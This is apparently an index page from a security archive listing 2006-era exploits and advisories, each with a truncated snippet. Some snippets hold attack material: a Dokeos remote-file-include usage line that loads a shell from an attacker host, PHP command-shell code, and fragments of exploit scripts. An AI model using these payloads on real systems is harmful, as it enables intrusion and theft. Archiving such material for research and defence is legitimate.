DZCP (deV!L`z Clanportal) 1.34 - 'id' SQL Injection

? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";...

yabbse-all.txt

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my first N3td3v Sponsering Disclosure..... NDSD-06-001: YABBSE SQL Injection June 23, 2006 -- Sponsered post http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html -- Affected Vendor...

Amrtalk.txt

SaVSaK.CoM | SpC-x - TheBeKiR | Amr Talkbox talkbox.PHP - Remote File Include Vulnerabilities Risk : High Class: Remote Script : Amr Talkbox Credits : SpC-x Thanks : TheBeKiR - Ejder - FasTBoY - ERNE - RMx Code : if $lang == "eng" include "$direct/langeng.txt"; elseif $lang =="ita" include...

REVERSING MRXSMB.SYS CHAPTER II “NtClose DeadLock”

REVERSING MRXSMB.SYS CHAPTER II “NtClose DeadLock” Rubn Santamarta [email protected] www.reversemode.com May 15, 2006 Abstract Kernel Object Manager is prone to a deadlock situation which could be exploitable making unkillable any process running, complicating its elimination. INDEX...

ishopcart-cgi-bof.c.txt

Vendor: ishopcart inc Vendor Site: ishopcart.com Vendor Status: notified via telephone While spending a night auditing I have found 2 buffer overflows and 1 directory traversal in the ishopcart cgi, which is written in C. The directory traversal is caused by how the cgi chooses to show pages. If,...

Microsoft Word object pointer memory corruption vulnerability

Overview A memory corruption vulnerability in Microsoft Word could allow a remote attacker to execute arbitrary code with the privileges of the user running Word. Description Microsoft Word contains a memory corruption vulnerability. According to Microsoft Security Bulletin MS06-027:When a user...

IntelliTamper 2.07 (*.map file) Local Arbitrary Code Execution Exploit

Exploit for unknown platform in category local exploits ====================================================================== IntelliTamper 2.07 .map file Local Arbitrary Code Execution Exploit ======================================================================...

ActualAnalyzer688.txt

======================================================================================= XOR Crew :: Security Advisory 4/10/2006 ======================================================================================= ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability...

[Full-disclosure] [XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability

======================================================================================= XOR Crew :: Security Advisory 4/10/2006 ======================================================================================= ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability...

dokeos.txt

!/usr/bin/perl Dokeos Learning Management System 1.6.4 Remote File Include Exploit & Advisorie: beford uso: perl own.pl perl own.pl http://host.com/dokeos/ http://atacante/shell.gif cmd cmd shell example: cmd variable: cmd; Description Vendor: http://www.dokeos.com/ The file...

[Full-disclosure] [XPA] - ISPConfig <= 2.2.2 - Remote Command Execution Vulnerability

======================================================================================= XOR Crew :: Security Advisory 5/6/2006 ======================================================================================= ISPConfig = 2.2.2 - Remote Command Execution Vulnerability...

Oracle DBMS_EXPORT_EXTENSION package vulnerable to SQL injection

Overview A vulnerability in Oracle PL/SQL Export Extensions may allow an attacker to modify privileged database information. Description Oracle Extensions, ODCIIndex Interface, andODCIIndexGetMetadata Oracle extensions are used to create customized Oracle database constructs. An indextype is an...

MySQL (<= 4.1.18 5.0.20) Local/Remote Information Leakage Exploit

No description provided by source. / April 21.st 2006 myanondbleak.c MySql Anonimous Login Memory Leak MySql = 5.0.20 MySql = 4.1.x copyright 2006 Stefano Di Paola stefano.dipaolaatwisec.it GPL 2.0 Disclaimer: In no event shall the author be liable for any damages whatsoever arising out of or in...

irater.txt

" ."target:" ."cmdshell:" ."cmd:" ."" .""; if !isset$POST'submit' echo $form; else $file = fopen "test.txt", "w+"; fwrite$file, ""; fclose$file; $file = fopen $target.$cmdshell, "r"; if !$file echo "Unable to get output.\n"; exit; echo $form; while !feof $file $line .= fgets $file, 1024.""; $tpos...

MySQL 5.0.20 - COM_TABLE_DUMP Memory LeakRemote Buffer Overflow

MySQL 5.0.20 - COMTABLEDUMP Memory LeakRemote Buffer Overflow / April 21.st 2006 myexploit.c MySql COMTABLEDUMP Memory Leak & MySql remote B0f MySql = 5.0.20 MySql COMTABLEDUMP Memory Leak MySql = 4.x.x copyright 2006 Stefano Di Paola stefano.dipaolaatwisec.it GPL 2.0 Disclaimer: In no event shal...

UltrVNC1.0.1.py.txt

Ultr@VNC 1.0.1 Client POC Code -- Though the Server appears safe against remote code execution, the client exploitation is trivial with OllyDbg. The following POC binds to port 5900 and executes a buffer overflow on vulnerable clients that connect. The client machine will then spawn an instance o...

Linux Kernel 2.6.x - sys_timer_create() Local Denial of Service

Linux Kernel 2.6.x - systimercreate Local Denial of Service ;nasm -f elf noHeaven.asm ;ld -s -o noHeaven noHeaven.o section .text global start count equ 8 ; threads count - do it quicker start: mov ebx, count call createthreads jmp done pause: mov eax,29 int 0x80 ret createthreads: mov eax,2 int...

TFT Gallery <= 0.10 [Password Disclosure] Remote Exploit

Exploit for unknown platform in category web applications ======================================================== TFT Gallery = 0.10 Password Disclosure Remote Exploit ======================================================== !/usr/bin/perl Copyright C undefined1 This program is free software; yo...

Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits =============================================================== Mercur Mailserver 5.0 SP3 IMAP Remote Buffer Overflow Exploit =============================================================== / mercur.cpp Atrium Mercur IMAP 5.0 SP3 Messaging...

vuSQL.pl.txt

!/usr/bin/perl use IO::Socket; VU Site Engine v. 2.0 add new admin exploit Bug found GeW http://www.security.nitro.ru Exploit coded by Censored - SV -------------------------------------------- Search Vulnerabilities // www.svt.nukleon.us if @ARGV newProto = "tcp", PeerAddr = "$host", PeerPort =...